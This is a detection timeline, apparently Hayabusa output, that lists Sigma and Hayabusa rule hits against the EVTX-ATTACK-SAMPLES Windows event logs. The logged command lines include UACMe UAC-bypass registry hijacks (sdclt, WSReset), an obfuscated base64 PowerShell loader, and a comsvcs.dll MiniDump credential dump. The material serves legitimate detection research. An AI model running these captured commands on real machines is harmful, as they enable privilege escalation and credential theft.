2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 16:26:35.182 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.228 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.650 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:16.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\ChangePk.exe"" : Path: C:\Windows\System32\changepk.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\slui.exe"" 0x03",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:18.321 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation/win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 444 00000280644250C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:20.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey : Path: C:\Windows\System32\SystemSettingsAdminFlows.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 17:56:22.193 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 53 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.612 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:28.925 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.409 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:29.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 300 000002806445E5C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 53",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.395 +09:00,MSEDGEWIN10,1,medium,High Integrity Sdclt Process,,rules/sigma/process_creation/sysmon_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.752 +09:00,MSEDGEWIN10,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:30.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\SysWOW64\notepad.exe : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 322 000002806447A490 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\msconfig.exe"" -5 : Path: C:\Windows\System32\msconfig.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Windows\SysWOW64\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 56 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 312 000002806444CB40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WSReset.exe"" : Path: C:\Windows\System32\WSReset.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 56",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,UAC Bypass WSReset,,rules/sigma/process_creation/win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WSReset.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Wsreset UAC Bypass,,rules/sigma/process_creation/win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,Bypass UAC via WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
